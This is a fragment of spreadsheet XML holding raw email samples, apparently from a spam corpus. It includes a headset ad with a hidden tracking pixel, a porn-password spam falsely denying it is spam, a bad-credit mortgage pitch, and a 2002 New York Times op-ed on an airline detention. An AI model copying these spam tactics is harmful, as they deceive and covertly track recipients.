    <t xml:space="preserve">&lt;html&gt;
 &lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;head&gt;&lt;/head&gt;&lt;body bgcolor="#FFFFFF"&gt;&lt;table width="760" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;table width="775" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td valign="top" height="440" width="504"&gt; 
       &lt;table width="509" border="0" align="center" cellpadding="0" cellspacing="0"&gt;
         &lt;tr&gt; 
           &lt;td&gt;
             &lt;div align="center"&gt; 
               &lt;table width="500" border="0" cellpadding="0" cellspacing="0"&gt;
   &lt;tr&gt; 
                   &lt;td colspan="4"&gt;&lt;div align="center"&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;font size="4" color="#FF0000"&gt;&lt;b&gt;Unleash 
                       your PC's Multimedia power TODAY!&lt;br&gt;
                       &lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
                   &lt;td width="156"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_01.gif" width="156" height="164" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                   &lt;td width="92"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_02.jpg" width="92" height="164" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                   &lt;td width="139"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_03.gif" width="139" height="78" border="0"&gt;&lt;/a&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_05.jpg" width="139" height="86" border="0"&gt;&lt;/a&gt;&lt;/td&gt;              &lt;td width="113"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_04.gif" width="113" height="164" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
                   &lt;td rowspan="2"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_06.gif" width="156" height="156" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                   &lt;td rowspan="2"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_07.gif" width="92" height="84" border="0"&gt;&lt;/a&gt;&lt;br&gt;
                     &lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_10.jpg" width="92" height="72" border="0"&gt;&lt;/a&gt;&lt;/td&gt;              &lt;td height="84" colspan="2"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_08.jpg" width="139" height="84" border="0"&gt;&lt;/a&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_09.gif" width="113" height="84" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
                   &lt;td height="72" colspan="2"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_11.jpg" width="139" height="72" border="0"&gt;&lt;/a&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_12.gif" width="113" height="72" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
                   &lt;td colspan="4"&gt;&lt;a href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img src="http://promote.thankugift.com/images/500x350_labtec_13.gif" width="500" height="30" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
             &lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width="501" border="0" cellspacing="0"&gt;
         &lt;tr&gt; 
           &lt;td colspan="3" height="2"&gt; 
             &lt;table width="100" border="0" cellspacing="0"&gt;
               &lt;tr&gt; 
                 &lt;td height="46"&gt; 
                   &lt;table width="500" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#285179"&gt;
                     &lt;tr align="center" bgcolor="#336699"&gt; 
                       &lt;td colspan="6"&gt;&lt;font color="#FFFFFF" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="4"&gt;Compare 
                         and Save&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="45" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;Price&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;S&amp;amp;H&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;Total&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;You 
                           Save&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;See 
                           for yourself&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#FFFFFF" class="plain"&gt;AMAZON&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$29.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$4.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$34.98&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76"&gt; 
                         &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain" color="#FF0000"&gt;70%&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://www.amazon.com/exec/obidos/redirect?tag=shippingonlyc-20&amp;path=tg/detail/-/B000052WMC/qid=1031163953/sr=8-1" target="_blank"&gt;Click 
                           here&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;&lt;span class="plain"&gt;CDW&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$29.21&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$7.53&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;$36.74&lt;span class="plain"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76"&gt; 
                         &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain" color="#FF0000"&gt;69%&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://www.cdw.com/shop/products/default.asp?edc=262511" target="_blank"&gt;Click 
                           here&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;&lt;span class="plain"&gt;Office 
                           Depot &lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$28.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$5.95&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$34.94&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76"&gt; 
                         &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain" color="#FF0000"&gt;69%&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://click.linksynergy.com/fs-bin/click?id=bmFP6pVHdo4&amp;offerid=27778.60640382&amp;type=10&amp;subid=" target="_blank"&gt;Click 
                           here&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td width="120" bgcolor="#4682b4"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font color="#FFFFFF"&gt;&lt;span class="plain"&gt;Office 
                           Max &lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$29.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="45"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain"&gt;$3.99&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="49"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;$33.98&lt;span class="plain"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="76"&gt; 
                         &lt;div align="center"&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" class="plain" color="#FF0000"&gt;70%&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                       &lt;/td&gt;
                       &lt;td width="151"&gt; 
                         &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://click.linksynergy.com/fs-bin/click?id=bmFP6pVHdo4&amp;offerid=32481.105637&amp;type=2&amp;subid=0" target="_blank"&gt;Click 
                           here&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td colspan="6" bgcolor="#336699" height="2"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FFFFFF"&gt;&lt;b&gt;&lt;font size="1" class="tiny"&gt;* 
                         Comparisons are based on similar model from leading merchants. 
                         &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=3&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;*Microsoft 
       Windows&amp;reg; approved and certified compatible with all major voice recognition 
       software.&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="10" height="440"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td height="440" width="261"&gt; 
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
         &lt;tr&gt; 
           &lt;td height="310"&gt; &lt;p&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt; &lt;/font&gt;&lt;/p&gt;
             &lt;table width="280" border="0" cellpadding="0" cellspacing="0"&gt;
               &lt;tr&gt;
                 &lt;td height="365"&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;b&gt;&lt;font size="3"&gt;Unleash 
                   your PC's Multimedia power TODAY &lt;/font&gt;&lt;/b&gt;with&lt;b&gt; &lt;/b&gt;the 
                   &lt;b&gt;LABTEC&lt;/b&gt; PATENTED &lt;b&gt;NCAT2&lt;/b&gt; noise cancelling-amplification 
                   technology!&lt;br&gt;
               &lt;br&gt;
               Use your PC for long distance calls and &lt;font color="#FF0000"&gt;&lt;b&gt;SAVE 
               BIG!&lt;/b&gt;&lt;/font&gt; Activate your PC and all your programs &lt;b&gt;USING 
               YOUR VOICE&lt;/b&gt;!&lt;br&gt;
               &lt;br&gt;
               &lt;b&gt;Video Conference&lt;/b&gt; with your friends IN REAL TIME! Send &lt;b&gt;VOICE 
               EMAIL&lt;/b&gt; or Chat worldwide over the Internet, &lt;b&gt;LIVE!&lt;/b&gt; - even 
               record your voice &amp; conversations &lt;b&gt;LIKE THE PRO'S&lt;/b&gt;.&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=2&gt; This is 
                     &lt;u&gt;THE&lt;/u&gt; best headset for your PC by the undisputed industry 
                     leader,&lt;b&gt; LABTEC&lt;/b&gt; - Producing unmatched sound quality, 
                     superior to any headset you've ever owned!&lt;font 
                   face="Verdana, Arial, Helvetica, sans-serif" size=3&gt; The ultimate 
                     in style and quality. Get yours today while they last! &lt;a href="labtecfaq.html" target="_blank"&gt;FAQ's&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;p&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;br&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
         &lt;tr&gt; 
           &lt;td height="106"&gt; 
             &lt;p align=center&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" 
             size=2 color="red"&gt;&lt;span class=plain&gt;&lt;b&gt;You can't get a better Headset 
               -- at a better price -- anywhere else!&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;span class=plain&gt;&lt;font 
             face="Verdana, Arial, Helvetica, sans-serif" size=2&gt; &lt;br&gt;
               You pay only: &lt;b&gt;$8.99&lt;br&gt;
               &lt;/b&gt;&lt;/font&gt;&lt;/span&gt;&lt;a 
             href="http://www.factorydirectdeals.com/giftshop/frugaljoe/1275/9/"&gt;&lt;img 
             height=33 src="http://promote.thankugift.com/images/434x355-pearl-8_04.gif" width=145 
             border=0&gt;&lt;/a&gt;&lt;/p&gt;
             &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 	&lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;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src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana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href="http://www.frugaljoe.com/unsubscribe.php?eid=389099\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=389099\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;/body&gt;&lt;/html&gt;&lt;img src="http://www.330w.com/open/open.php?eid=zzzz@spamassassin.taint.org&amp;oid=Special_Offer-09192002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Horny?..Stop Paying for Porn - 12 Free Passes
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free Porn Passwords&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000" vlink="#0000CC" alink="#0000CC" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;div style="FONT: 10pt arial"&gt;
   &lt;table width="770" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
     &lt;tr&gt; 
       &lt;td&gt;&lt;a href="http://www.optinemailservices.com/promo/717/" target="_blank"&gt;&lt;img src="http://www.optinemailservices.com/promo/717/creative/mailertop.jpg" width="770" height="183" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt; 
       &lt;td&gt; 
         &lt;table width="770" border="1" cellspacing="0" cellpadding="5" bordercolor="#999999"&gt;
           &lt;tr&gt; 
             &lt;td bgcolor="#EEEEEE"&gt; 
               &lt;table width="100%" border="0" cellspacing="0" cellpadding="5" align="center"&gt;
                 &lt;tr&gt; 
                   &lt;td bgcolor="#FF0000"&gt; 
                     &lt;div align="center"&gt;&lt;font face=Arial,Helvetica&gt;&lt;font size="+2" color="#FFFFFF"&gt;I 
                       Know You want Pics of Hot Babes Right? I Bet You Want to 
                       get into &lt;br&gt;
                       the Best Porn Sites for Free too?&lt;/font&gt;&lt;/font&gt; &lt;font face="Arial,Helvetica" color="#FFFFFF"&gt;&lt;font size="+2"&gt; 
                       Here's a secret:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                   &lt;td&gt; 
                     &lt;div align="center"&gt;&lt;font face=Arial,Helvetica&gt;&lt;font color=#ffcc00&gt;&lt;font size="+4" color="#0000FF"&gt;&lt;a href="http://www.optinemailservices.com/promo/717/" target="_blank"&gt;&amp;gt; 
                       &amp;gt; Get Into Paysites Free!&amp;lt; &amp;lt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                   &lt;td bgcolor="#0000CC"&gt; 
                     &lt;div align="center"&gt;&lt;font 
 face=Arial,Helvetica&gt;&lt;font size="+1" color="#FFFFFF"&gt;Take&lt;/font&gt;&lt;font size="+1"&gt; 
                       &lt;font color="#FF0000"&gt;a minute &lt;/font&gt;&lt;font color="#FFFFFF"&gt;to 
                       read what I've got to tell you, and will have full access&lt;/font&gt;&lt;/font&gt;&lt;/font&gt; 
                       &lt;font color="#FFFFFF" size="+1"&gt;&lt;font face=Arial,Helvetica&gt;to 
                       some of the internet's HOTTEST membership sites for FREE.&lt;/font&gt;&lt;/font&gt; 
                     &lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;div&gt;&lt;/div&gt;
 &lt;center&gt;
   &lt;p&gt;&lt;b&gt;&lt;font face=Arial,Helvetica&gt;&lt;font size=+4&gt;&lt;a 
 href="http://www.optinemailservices.com/promo/717/" target=_blank&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt; 
   &lt;p&gt;&lt;i&gt;&lt;font face=Arial,Helvetica&gt;&lt;font color=#ff0000&gt;&lt;font size=+2&gt;This costs 
     nothing!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt; 
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;center&gt;  
 &lt;br&gt;
      &lt;font face="Times New Roman, Times, serif" size="1" color="#666666"&gt;Note&lt;/font&gt;&lt;font color="#666666" size="1"&gt;: 
 	 this is not a spam email. This email was sent to you because your email was 
      entered in on a website &lt;br&gt;
 	 requesting to be a registered subscriber. If you would would like to be removed 
      from our list,&lt;br&gt;
   &lt;a href="http://teen-mail.com/cgi-bin/stopM.cgi/T_39403439535887/webmaster" style="text-decoration: none" target="_blank"&gt;&lt;font color="#0000FF"&gt;CLICK 
   HERE&lt;/font&gt;&lt;/a&gt; TO CANCEL YOUR ACCOUNT and you will *never* receive another 
   email from us!&lt;/font&gt;&lt;/div&gt;
             &lt;/center&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: High-Altitude Rambos
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.nytimes.com/2002/09/23/opinion/23HERB.html?todaysheadlines=&amp;pagewanted=print&amp;position=top
  The New York Times
 September 23, 2002
 High-Altitude Rambos
 By BOB HERBERT
 Dr. Bob Rajcoomar, a U.S. citizen and former military physician from Lake
 Worth, Fla., found himself handcuffed and taken into custody last month in
 one of the many episodes of hysteria to erupt on board airliners in the
 U.S. since the Sept. 11 attacks.
 Dr. Rajcoomar was seated in first class on a Delta Airlines flight from
 Atlanta to Philadelphia on Aug. 31 when a passenger in the coach section
 began behaving erratically. The passenger, Steven Feuer, had nothing to do
 with Dr. Rajcoomar.
 Two U.S. air marshals got up from their seats in first class and moved back
 to coach to confront Mr. Feuer, who was described by witnesses as a slight
 man who seemed disoriented. What ensued was terrifying. When Mr. Feuer
 refused to remain in his seat, the marshals reacted as if they were trying
 out for the lead roles in Hollywood's latest action extravaganza.
 They handcuffed Mr. Feuer, hustled him into first class and restrained him
 in a seat next to Dr. Rajcoomar. The 180 or so passengers were now quite
 jittery. Dr. Rajcoomar asked to have his seat changed and a flight
 attendant obliged, finding him another seat in first class. The incident,
 already scary, could - and should - have ended there. But the marshals were
 not ready to let things quiet down.
 One of the marshals pulled a gun and brandished it at the passengers. The
 marshals loudly demanded that all passengers remain in their seats, and
 remain still. They barked a series of orders. No one should stand for any
 reason. Arms and legs should not extend into the aisles. No one should try
 to visit the restroom. The message could not have been clearer: anyone who
 disobeyed the marshals was in danger of being shot.
 The passengers were petrified, with most believing that there were
 terrorists on the plane.
 "I was afraid there was going to be a gun battle in that pressurized
 cabin," said Senior Judge James A. Lineberger of the Philadelphia Court of
 Common Pleas, a veteran of 20 years in the military, who was sitting in an
 aisle seat in coach. "I was afraid that I was going to die from the gunfire
 in a shootout."
 Dr. Rajcoomar's wife, Dorothy, who was seated quite a distance from her
 husband, said, "It was really like Rambo in the air." She worried that
 there might be people on the plane who did not speak English, and therefore
 did not understand the marshals' orders. If someone got up to go to the
 bathroom, he or she might be shot.
 There were no terrorists on board. There was no threat of any kind. When
 the plane landed about half an hour later, Mr. Feuer was taken into
 custody. And then, shockingly, so was Dr. Rajcoomar. The air marshals
 grabbed the doctor from behind, handcuffed him and, for no good reason that
 anyone has been able to give, hauled him to an airport police station where
 he was thrown into a filthy cell.
 This was airline security gone berserk. No one ever suggested that Dr.
 Rajcoomar, a straight-arrow retired Army major, had done anything wrong.
 Dr. Rajcoomar, who is of Indian descent, said he believes he was taken into
 custody solely because of his brown skin. He was held for three frightening
 hours and then released without being charged. Mr. Feuer was also released.
 Officials tried to conceal the names of the marshals, but they were
 eventually identified by a Philadelphia Inquirer reporter as Shawn B.
 McCullers and Samuel Mumma of the Transportation Security Administration,
 which is part of the U.S. Transportation Department.
 The Transportation Security Administration has declined to discuss the
 incident in detail. A spokesman offered the absurd explanation that Dr.
 Rajcoomar was detained because he had watched the unfolding incident "too
 closely."
 If that becomes a criterion for arrest in the U.S., a lot of us reporters
 are headed for jail.
 Dr. Rajcoomar told me yesterday that he remains shaken by the episode. "I
 had never been treated like that in my life," he said. "I was afraid that I
 was about to be beaten up or killed."
 Lawyers for the American Civil Liberties Union have taken up his case and
 he has filed notice that he may sue the federal government for unlawful
 detention.
 "We have to take a look at what we're doing in the name of security," said
 Dr. Rajcoomar. "So many men and women have fought and died for freedom in
 this great country, and now we are in danger of ruining that in the name of
 security."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</si>
  <si>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best home mortgage rate             MOFJN
</t>
  </si>
  <si>
    <t xml:space="preserve">Intelligence
 Bad Credit? Great!
 We want you!
 We want to refinance people that DO NOT
 have good credit. 
 Have you had credit in  the past? Good! 
 Fill out this short form because we want 
 to refinance your house! 
 Poor credit is all we do!
 Let us Put Our Expertise to Work for You!
 http://wdBmWYjno1@agileconcepts.com/74205/
 Erase
 http://ltgjSs5P9a@agileconcepts.com/optout.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Promises.
</t>
  </si>
  <si>
    <t xml:space="preserve">
